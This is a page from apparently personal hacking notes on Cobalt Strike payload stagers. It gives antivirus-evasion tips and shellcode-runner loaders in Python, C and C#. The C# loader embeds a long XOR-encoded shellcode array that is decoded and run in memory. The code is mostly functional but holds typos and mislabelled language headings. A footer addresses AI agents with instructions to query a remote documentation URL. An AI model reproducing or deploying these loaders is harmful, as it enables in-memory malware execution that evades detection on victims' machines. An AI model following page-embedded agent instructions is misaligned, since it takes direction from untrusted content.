# Stagers

## Stagers:

#### Stagers general:&#x20;

* allocate memory (length of shellcode) to inject into memory&#x20;
* Once memory has been allocated - write the shellcode into memory
* create a thread that executed the shellcode written into the current process (ensuring when the process injected into doesn't die) &#x20;
* keep current process running until the thread (beacon session) exits

#### Stagers function calls:&#x20;

* `VirtualAlloc` - Allocates memory
* `RtlMoveMemory` - Copies shellcode into space allocated by VirtualAlloc call
* `CreateThreat` - Creates threat that executed shellcode&#x20;
* `WaitForSingleObject` - Tells program to wait until threate created exists before closing

#### potential AV catch points:

* allocating memory with RWX (ReadWriteExecute) (hex: 0x40) (hex:0x04 RW) (<https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants>)
* looking for function calls that use them three in quick sucessions
* don't compile using Linux/mingw/Wine&#x20;

## Basic stagers:

Only need RWX if you're using an encoded shellcode. Stage\_encoding can occur OTW &#x20;

```python
import ctypes 
shellcode = b"BUFFER_SHELLCODE"
allocated_memory = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x300),ctypes.c_int(0x04))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(allocated_memory),shellcode,ctypes.c_int(len(shellcode)))
changed_protections = ctypes.windll.kernel32.VirtualProtect(ctypes.c_int(allocated_memory),ctypes.c_int(len(shellcode)),ctypes.c_int(0x10),ctypes.byref(ctypes.c_unint32(0)))
thread_running_shellcode = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctpyes.c_int(0),ctpyes.c_int(allocated_memory),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread_running_shellcode),ctypes.c_int(-1))
```

#### C#:

```csharp
#include <windows.h>
#include <stdio.h>
#include <string.h>
int main()
{
    LPVOID lpvAddr;
    HANDLE hHand;
    DWORD dwWaitResult;
    DWORD threadID;
unsigned char buff[] = "BUFFER_SHELLCODE";

lpvAddr = VirtualAlloc(Null, strlen(buff),0x3000,0x40);
RtlMoveMemory(lpvAddr, buff, strlen(buff));
hHand = CreateThread(NULL, 0, lpvaddr, NULL, 0, &ThreadID);
dwWaitResult = WaitForSingleObject(hHand, INFINITE);
return 0
}
```

## c++:

using system; using System.Net; using System.Net.Sockets; using System.Runting.InteropServices; using System.Threading;

namespace slksdf { class ajksnlksdf { \[DllImport("Kernel32")] private static extern UInt32 HeapCreate(UInt32 HeapCreate1,UInt32 HeapCreate2, UInt32 HeapCreate3);

```cpp
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;

namespace slksdf
{
    class ajksnlksdf
    {
        [DllImport("Kernel32")] 
        private static extern UInt32 HeapCreate(UInt32 HeapCreate1, UInt32 HeapCreate2, UInt32 HeapCreate3);
        [DllImport("Kernel32")] 
        private static extern UInt32 HeapAlloc(UInt32 HeapAlloc1, UInt32 HeapAlloc2, UInt32 HeapAlloc3);
        [DllImport("Kernel32")] 
        private static extern UInt32 RtlMoveMemory(UInt32 RtlMoveMemory1, byte[] RtlMoveMemoryByte, UInt32 RtlMoveMemory3);
        [DllImport("Kernel32")] 
        private static extern IntPtr CreateThread(UInt32 CreateThread1, UInt32 CreateThread2, UInt32 CreateThread3, IntPtr CreateThread4, UInt32 CreateThread5, ref UInt32 CreateThread6);
        [DllImport("Kernel32")] 
        private static extern IntPtr WaitForSingleObject(IntPtr WaitForSingleObject1, UInt32 WaitForSingleObject2);
        static void Main()
        {
            byte[] BYTE = { 0x94, 0x20, 0xeb, 0x8c, 0x98, 0x80, 0xa4, 0x68, 0x68, 0x68, 0x29, 0x39, 0x29, 0x38, 0x3a, 0x39, 0x3e, 0x20, 0x59, 0xba, 0x0d, 0x20, 0xe3, 0x3a, 0x08, 0x20, 0xe3, 0x3a, 0x70, 0x20, 0xe3, 0x3a, 0x48, 0x20, 0x67, 0xdf, 0x22, 0x22, 0x25, 0x59, 0xa1, 0x20, 0xe3, 0x1a, 0x38, 0x20, 0x59, 0xa8, 0xc4, 0x54, 0x09, 0x14, 0x6a, 0x44, 0x48, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x8a, 0x85, 0x3a, 0x29, 0x39, 0x20, 0xe3, 0x3a, 0x48, 0xe3, 0x2a, 0x54, 0x20, 0x69, 0xb8, 0x0e, 0xe9, 0x10, 0x70, 0x63, 0x6a, 0x67, 0xed, 0x1a, 0x68, 0x68, 0x68, 0xe3, 0xe8, 0xe0, 0x68, 0x68, 0x68, 0x20, 0xed, 0xa8, 0x1c, 0x0f, 0x20, 0x69, 0xb8, 0x38, 0xe3, 0x20, 0x70, 0x2c, 0xe3, 0x28, 0x48, 0x21, 0x69, 0xb8, 0x8b, 0x3e, 0x20, 0x97, 0xa1, 0x29, 0xe3, 0x5c, 0xe0, 0x20, 0x69, 0xbe, 0x25, 0x59, 0xa1, 0x20, 0x59, 0xa8, 0xc4, 0x29, 0xa9, 0xa1, 0x65, 0x29, 0x69, 0xa9, 0x50, 0x88, 0x1d, 0x99, 0x24, 0x6b, 0x24, 0x4c, 0x60, 0x2d, 0x51, 0xb9, 0x1d, 0xb0, 0x30, 0x2c, 0xe3, 0x28, 0x4c, 0x21, 0x69, 0xb8, 0x0e, 0x29, 0xe3, 0x64, 0x20, 0x2c, 0xe3, 0x28, 0x74, 0x21, 0x69, 0xb8, 0x29, 0xe3, 0x6c, 0xe0, 0x20, 0x69, 0xb8, 0x29, 0x30, 0x29, 0x30, 0x36, 0x31, 0x32, 0x29, 0x30, 0x29, 0x31, 0x29, 0x32, 0x20, 0xeb, 0x84, 0x48, 0x29, 0x3a, 0x97, 0x88, 0x30, 0x29, 0x31, 0x32, 0x20, 0xe3, 0x7a, 0x81, 0x23, 0x97, 0x97, 0x97, 0x35, 0x20, 0x59, 0xb3, 0x3b, 0x21, 0xd6, 0x1f, 0x01, 0x06, 0x01, 0x06, 0x0d, 0x1c, 0x68, 0x29, 0x3e, 0x20, 0xe1, 0x89, 0x21, 0xaf, 0xaa, 0x24, 0x1f, 0x4e, 0x6f, 0x97, 0xbd, 0x3b, 0x3b, 0x20, 0xe1, 0x89, 0x3b, 0x32, 0x25, 0x59, 0xa8, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xd2, 0x52, 0x3e, 0x11, 0xcf, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0x67, 0x68, 0x68, 0x68, 0x59, 0x51, 0x5a, 0x46, 0x59, 0x5e, 0x50, 0x46, 0x5d, 0x51, 0x46, 0x59, 0x5b, 0x5b, 0x68, 0x32, 0x20, 0xe1, 0xa9, 0x21, 0xaf, 0xa8, 0x28, 0x77, 0x68, 0x68, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x02, 0x6b, 0x3b, 0x21, 0xd2, 0x3f, 0xe1, 0xf7, 0xae, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x80, 0xa2, 0x68, 0x68, 0x68, 0x47, 0x3b, 0x51, 0x09, 0x3b, 0x58, 0x07, 0x02, 0x5c, 0x37, 0x12, 0x5b, 0x0b, 0x3f, 0x51, 0x59, 0x32, 0x1d, 0x2f, 0x09, 0x1f, 0x22, 0x39, 0x22, 0x31, 0x30, 0x0e, 0x26, 0x1f, 0x09, 0x09, 0x31, 0x00, 0x0f, 0x3a, 0x1a, 0x1b, 0x10, 0x3d, 0x12, 0x24, 0x26, 0x37, 0x02, 0x3e, 0x05, 0x32, 0x59, 0x5f, 0x12, 0x27, 0x2b, 0x0b, 0x05, 0x31, 0x0b, 0x59, 0x02, 0x5c, 0x18, 0x51, 0x11, 0x5e, 0x24, 0x1d, 0x21, 0x09, 0x2c, 0x12, 0x2f, 0x10, 0x1d, 0x19, 0x23, 0x45, 0x18, 0x5c, 0x32, 0x2f, 0x00, 0x23, 0x39, 0x0a, 0x0d, 0x1e, 0x32, 0x1e, 0x5b, 0x3c, 0x5f, 0x24, 0x20, 0x0c, 0x27, 0x1f, 0x31, 0x38, 0x19, 0x06, 0x2c, 0x58, 0x3a, 0x23, 0x12, 0x2f, 0x0e, 0x58, 0x38, 0x2a, 0x07, 0x58, 0x0b, 0x3c, 0x30, 0x06, 0x27, 0x20, 0x39, 0x24, 0x12, 0x31, 0x1e, 0x1b, 0x0f, 0x03, 0x1e, 0x18, 0x3e, 0x27, 0x04, 0x38, 0x2a, 0x3b, 0x21, 0x3e, 0x32, 0x3e, 0x0a, 0x02, 0x02, 0x1e, 0x3b, 0x3c, 0x3b, 0x19, 0x04, 0x2e, 0x5f, 0x03, 0x03, 0x3e, 0x06, 0x0d, 0x0d, 0x21, 0x45, 0x30, 0x38, 0x2f, 0x32, 0x01, 0x32, 0x29, 0x11, 0x0e, 0x51, 0x32, 0x31, 0x26, 0x05, 0x06, 0x05, 0x59, 0x59, 0x1f, 0x2a, 0x02, 0x1c, 0x0a, 0x5e, 0x10, 0x19, 0x5a, 0x0c, 0x1c, 0x27, 0x26, 0x3f, 0x3a, 0x5d, 0x5f, 0x2c, 0x2c, 0x0e, 0x11, 0x18, 0x10, 0x59, 0x24, 0x30, 0x04, 0x68, 0x20, 0xe1, 0xa9, 0x3b, 0x32, 0x29, 0x30, 0x25, 0x59, 0xa1, 0x3b, 0x20, 0xd0, 0x68, 0x6a, 0x40, 0xec, 0x68, 0x68, 0x68, 0x68, 0x38, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x83, 0x3d, 0x46, 0x53, 0x97, 0xbd, 0x20, 0xe1, 0xae, 0x02, 0x62, 0x37, 0x3b, 0x32, 0x20, 0xe1, 0x99, 0x25, 0x59, 0xa1, 0x25, 0x59, 0xa1, 0x3b, 0x3b, 0x21, 0xaf, 0xaa, 0x45, 0x6e, 0x70, 0x13, 0x97, 0xbd, 0xed, 0xa8, 0x1d, 0x77, 0x20, 0xaf, 0xa9, 0xe0, 0x7b, 0x68, 0x68, 0x21, 0xd2, 0x2c, 0x98, 0x5d, 0x88, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0x97, 0xa7, 0x1c, 0x6a, 0x83, 0xa4, 0x80, 0x3d, 0x68, 0x68, 0x68, 0x3b, 0x31, 0x02, 0x28, 0x32, 0x21, 0xe1, 0xb9, 0xa9, 0x8a, 0x78, 0x21, 0xaf, 0xa8, 0x68, 0x78, 0x68, 0x68, 0x21, 0xd2, 0x30, 0xcc, 0x3b, 0x8d, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xfb, 0x3b, 0x3b, 0x20, 0xe1, 0x8f, 0x20, 0xe1, 0x99, 0x20, 0xe1, 0xb2, 0x21, 0xaf, 0xa8, 0x68, 0x48, 0x68, 0x68, 0x21, 0xe1, 0x91, 0x21, 0xd2, 0x7a, 0xfe, 0xe1, 0x8a, 0x68, 0x68, 0x68, 0x68, 0x97, 0xbd, 0x20, 0xeb, 0xac, 0x48, 0xed, 0xa8, 0x1c, 0xda, 0x0e, 0xe3, 0x6f, 0x20, 0x69, 0xab, 0xed, 0xa8, 0x1d, 0xba, 0x30, 0xab, 0x30, 0x02, 0x68, 0x31, 0x21, 0xaf, 0xaa, 0x98, 0xdd, 0xca, 0x3e, 0x97, 0xbd };
            for (int i = 0; i < BYTE.Length; i++)
            {
                BYTE[i] = (byte)(BYTE[i] ^ (byte)'h');
            }
            UInt32 CreateHeap = HeapCreate(0x00040000, (UInt32)BYTE.Length, 0);
            UInt32 AllocHeap = HeapAlloc(CreateHeap, 0x00000008, (UInt32)BYTE.Length);
            RtlMoveMemory(AllocHeap, BYTE, (UInt32)BYTE.Length);
            UInt32 Zero = 0;
            IntPtr ThreadCreate = CreateThread(0, 0, AllocHeap, IntPtr.Zero, 0, ref Zero);
            WaitForSingleObject(ThreadCreate, 0xFFFFFFF);
        }
    }
}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://f1rstbyt3.gitbook.io/hacking-notes/command-and-control/cobaltstrike/payload-generation/stagers.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.